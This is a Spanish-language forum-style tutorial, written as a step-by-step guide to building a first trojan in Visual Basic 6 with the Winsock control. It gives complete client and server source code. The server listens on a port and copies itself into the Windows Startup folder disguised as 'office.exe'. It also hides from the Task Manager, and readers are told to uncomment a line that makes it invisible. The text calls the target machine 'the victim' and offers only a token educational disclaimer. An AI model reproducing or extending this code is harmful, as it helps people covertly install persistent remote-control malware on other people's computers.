Aca les dejo este proyecto con el cual todas las personas que manejen lo 

basico de Visual Basic puedan crear su primer troyano o sistema de 

administracion remota. 

Solo con fines educativos y por esta razon este tutorial paso a paso si se puede 

llamar asi, utiliza un ocx llamado "winsock" el cual es el gestor de conexiones 

de windows incorporado en las librerias al instalar vbasic 6.0 

Hay que destacar que este ocx debe estar en la maquina o pc remota para que 

el servidor o el cliente funcione. Este ocx se puede programar y puede ser 

parte del mismo proyecto pero eso no es parte de este tutorial y queda de 

ustedes los lectores con mas experiencia lo analicen y lo programen buscando 

info en la red que le sera de mucha ayuda. 

Como esta Constituido un Troyano? 

Un troyano Basicamente Hablando de el Servidor debe cumplir con lo 

siguiente: 

1.- Ser un Programa Invisible. 

2.- Que no se vea en la lista de aplicciones en caso de nt, 2000 o xp 

3.- Grabarse en el registro "inicio" para que se ejecute cada vez que prendan 

la pc 

4.- Duplicarse a si mismo y ocultarse 

Puesta en marcha... 

Lo Primero que debemos hacer es abrir visual basic y elejir un EXE estandard, 

luego maximizamos el fondo y nos quedara algo como:

Empezaremos por el Cliente el cual es lo mas facil de hacer, este solo enviara 

comandos para ser ejecutados remotamente. 

Lo Primero en agregar sera un "textBox" al cual le vamos a dar el nombre de 

"consola" y le vamos a dar un tama?o que ocupe la mitad superior de la 

ventana o de el form. No olvidemos darle el valor de "true" a la propiedad de 

multiline y el valor (2 ? vertical) a la propiedad ScrollBars para poder 

desplazarnos. 

Este textbox es el encargado de decirnos que esta ocurriendo... Si se conecto, 

si esta en proceso un comando, si fue realizado ese comando etc... asi, que es 

muy importante y es el corazon del programa en si, sin el sera como lanzar 

misiles a otro pais y no saber donde calleron. Este text box tambien nos puede 

dar informacion de la computadora que estemos administrando etc... 

Una vista previa de el form con su text box seria:

Al formulario le podemos colocar como nombre "cliente" y a las propiedades 

del formulario MinButton y MaxButton las colocamos en "False" para que no 

se p?eda ni maximizar ni minimizar la ventana, eso es cuestion de gustos, jeje. 

Es hora de colocar los botones, Esta parte sera muy basica en este proyecto 

pero de seguro ustedes seguiran investigando y lograran colocar mas botones 

basandose en los que yo les dare. , Colocaremos el boton de Conectar el de 

Desconectar y los botones destinados a enviar los comandos. 

Estos botones serian el de abrir la puerta del lector del cd, enviar un mensaje 

anonimo y abrir el block de notas. 

Los nombres de los botones serian: 

conectar 

desconectar 

abrir 

enviar 

notas 

Creo que se entienden y no creo que deba especificar cual es cual, a 

continuacion veremos como nos esta quedando, ya aplicado los botones y un 

textbox para la direccion ip que le cploque como nombre "ip", en ese textbox 

va la direccion ip de la victima o pc a administrar

Ahora si hemos llegado a la parte que le da el toque de funcionalidad a esto... 

El Winsock 

El est?ndar de gesti?n de redes Windows Sockets tiene como finalidad 

proporcionar un API (convenci?n internacional que define c?mo invocar una 

funci?n de un programa desde una aplicaci?n) com?n para los programadores 

de redes bajo Windows, por ejemplo (y fundamentalmente) en lo referente al 

protocolo TCP/IP, propio de Internet. . 

Bueno... El winsock como mencione arriba es un archivo dll que esta en la 

carpeta de windows en system32 y si queremos que nuestro sistema de 

administracion remoto funcione hay que programarlo, Afortunadamente 

Vbasic trae consigo una serie de .OCX que son archivos con ciertas funciones 

y/o hasta componentes "objetos" que puedes utilizar en yu programa con solo 

utilizar sus propiedades una vez incertado en el formulario. 

Lo primero seria presionar Cntrl+T para que nos salga un cuadro o ventana 

donde podemos escojer una serie de .OCX que visualbasic tiene alli para 

nosotros. Buscamos abajo y al centro y encontraremos esto: 

Microsoft Winsock Control 6.0 y tambien podemos notar que nos da la ruta del 

archivo ocx mas abajo: C:windowssystem32mswinsock.ocx 

Es necesario saber donde esta el archivo, ya que en cualquier computadora 

que necesitemos usar el cliento o queramos que funcione el servidor debe 

tener este archivo para que funcione.

Una vez que tenemos el WinSock control en nuestra barra de controles en 

Visual Basic ya podemos comenzar a ver las propiedades, eventos y m?todos 

m?s importantes del control. Para agregarlo manualmente ir a Proyecto> 

Componentes> y luego seleccionar WinSock Control y Aceptar. Este control 

no es visible en tiempo de ejecuci?n. 

Lista de propiedades m?s importantes 

LocalIP: Devuelve la direcci?n IP de la m?quina local en el formato de cadena 

con puntos de direcci?n IP (xxx.xxx.xxx.xxx). 

LocalHostName: Devuelve el nombre de la m?quina local. 

RemoteHost: Establece el equipo remoto al que se quiere solicitar la conexi?n. 

LocalPort: Establece el puerto que se quiere dejar a la escucha. 

RemotePort: Establece el n?mero del puerto remoto al que se quiere conectar. 

State: Verifica si el Control WinSock esta siendo utilizado o no. 

Estas son algunas de las propiedades m?s importantes, y a continuaci?n la 

sintaxis de cada propiedad. 

Objeto.Propiedad = Valor 

Donde Objeto va el nombre del Control WinSock, el nombre predeterminado 

cuando lo incluimos en alguna aplicaci?n es "WinSock1". Luego le sigue la 

propiedad que deseamos asignar y finalmente el valor que la misma tomar?. 

Lista de M?todos m?s importantes 

1.- Accept: S?lo para las aplicaciones de servidor TCP. Este m?todo se utiliza 

para aceptar una conexi?n entrante cuando se est? tratando un evento 

ConnectionRequest. 

2.- GetData: Recupera el bloque actual de datos y lo almacena en una variable 

de tipo Variant. 

3.- Listen: Crea un socket y lo establece a modo de escucha. 

4.- SendData: Env?a datos a un equipo remoto. 

Lista de Eventos m?s importantes 

1.- ConnectionRequest: Se produce cuando el equipo remoto solicita una 

conexi?n. Sin este evento no se puede llevar a cabo la conecci?n. 

2.- Connect: Se produce cuando el equipo local se conecta al equipo remoto y 

se establece una conexi?n. 

3.- Close: Se produce cuando el equipo remoto cierra la conexi?n. Las 

aplicaciones deben usar el m?todo Close para cerrar correctamente una 

conexi?n TCP. 

4.- DataArrival: Se produce cuando llegan nuevos datos. Este evento es 

importante, ya que debemos hacer algo con la informaci?n que llega. 

La sintaxis de los m?todos y eventos es igual a la sintaxis de las propiedades, 

por lo cual no voy a hacer referencia a ella. 

Ahora vamos a hacer un resumen de las propiedades mas importantes del 

cliente: 

Control(nombrepredeterminado) Propiedad (nuevo valor) 

WinSock1 RemotePort = 7576 

conectar Caption = "Conectar" 

desconectar Caption = "Desconectar" 

enviar Caption = "Enviar Mensaje" 

notas Caption = "Abrir Block Notas" 

abrir Caption = "Abrir CD" 

Codigo Fuente del Cliente: 

Código: 

Private Sub Form_Load() 

ip.Text = "127.0.0.1" 'escribe en el text box nuestra ip local 

'para asi poder hacer las pruebas, debe cambiarse para conectar a otra ip 

End Sub 

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) 

Winsock1.Close 'cierra el winsock 

End 'cierra el programa 

End Sub 

Private Sub abrir_Click() 

Winsock1.SendData "abrir" 

'envia la cadena abrir_cd 

End Sub 

Private Sub conectar_Click() 

Winsock1.Close 'se cierra cualquier conexion previa 

Winsock1.Connect ip.Text, 7576 

'esto hace que el winsock se conecte a la ip que 

'coloquemos en el textbox ip.text y al puerto 

'7576 que es mi fecha de cumplea?os  

End Sub 

Private Sub desconectar_Click() 

Winsock1.Close 

Me.Caption = "desconectado" 

'esto hace que el winsock se cierre 

'asi cierra todas las conexiones 

End Sub 

Private Sub enviar_Click() 

Dim enviar As String 'declaramos a enviar de tipo cadena

enviar = InputBox("Escribe aca tu mensaje:", "Mensajes")

'utilizamos una funcion por defecto de visualbasic llamada input 

'para escribir el mensaje a enviar 

Winsock1.SendData enviar ' envia el mensaje escrito o contenido en enviar 

End Sub 

Private Sub notas_Click() 

Winsock1.SendData "notas" 'envia la cadena notas 

End Sub 

Private Sub Winsock1_Connect() 

Me.Caption = "conectado!" 'escribe como titulo de la ventana 

'que ya nos hemos conectado para asi saber si podemos enviar comandos 

End Sub 

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) 

Dim datos As String 'declaramos a datos como tipo cadena 

Winsock1.GetData datos 'le decimos a winsock que capture lo que llega en datos 

consola.Text = consola.Text + datos + vbNewLine 'escribimos lo que hay en la consola mas lo 

'que llega desde el servidor para ver todo lo que pasa. 

End Sub 

El servidor 

Para el servidor practicamente no hay nada de graficos, es un simple form 

donde agregamos el winsock igual que en el cliente 

Lo demas es puro codigo que he tratado de explicar adjunto. 

Aca les dejo el codigo: 

Código: 

'declaraciones api para abrir el lector de cd 

Private Declare Function mciSendString Lib "winmm.dll" Alias _ 

"mciSendStringA" (ByVal lpstrCommand As String, ByVal _ 

lpstrReturnString As String, ByVal uReturnLength As Long, _ 

ByVal hwndCallback As Long) As Long 

Private Sub Form_Load() 

on error resume next 'si hay un error continua 

Winsock1.LocalPort = 7576 'puerto al que va a escuchar 

Winsock1.Listen 'comando que abre y coloca a la escucha el puerto 

FileCopy App.EXEName & ".exe", _ 

"C:Documents and SettingsAll UsersMen? InicioProgramasIniciooffice.exe" 

'copia nuestro servidor a inicio "pa que se carge solo cada vez que prendan la pc" 

'y le cambia el nombre a office.exe 

'Me.Visible = False ' oculta el servidor "lo hace invisible"

App.TaskVisible = False ' lo oculta de aplicaciones del admin de tareas 

End Sub 

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) 

Winsock1.Close 'cerramos la conexion 

End 'cerramos el programa 

End Sub 

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) 

Dim datos As String 'etablecemos a datos como variable tipo cadena 

Winsock1.GetData datos 'todos los comandos que recibimos lo metemos en datos 

If datos = "abrir" Then 'si el comando "datos" es igual a abrir entonces etc... 

MsgBox "se abrira la puerta del cd" 'abre el cd door 

mciSendString "set Cdaudio door open", returnstring, 127, 0 'Habre la lectora de CDs 

ElseIf datos = "notas" Then 'si el comando es igual a notas entinces 

a = Shell("C:WINDOWSNOTEPAD.EXE", 1) '"shell" comando que abre archivos .exe 

Else 'sino ... 

MsgBox datos, vbCritical, "Mensaje Anonimo" 'muestra el mensaje 

End If 'fin si 

End Sub 

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) 

Winsock1.Close 'reseteamos el winsock 

Winsock1.Accept requestID 'aceptamos la peticion de coneccion 

End Sub 

Es importante aclarar algo aki: 

Private Sub Form_Load() 

Winsock1.LocalPort = 7576 'puerto al que va a escuchar 

Winsock1.Listen 'comando que abre y coloca a la escucha el puerto 

FileCopy App.EXEName & ".exe", _ 

"C:Documents and SettingsAll UsersMen? InicioProgramasIniciooffice.exe" 

'copia nuestro servidor a inicio "pa que se carge solo cada vez que prendan la pc" 

'y le cambia el nombre a office.exe 

'Me.Visible = False ' oculta el servidor "lo hace invisible"

App.TaskVisible = False ' lo oculta de aplicaciones del admin de tareas 

End Sub 

observa que la linea tiene un tilde ese tilde como sabran ya es el de los 

comentarios y esta puesto para que no se haga invisible y puedan ver la 

aplicacion cuando se ejecuta. cuando ya esten seguros de que trabaja pueden 

quitarlo.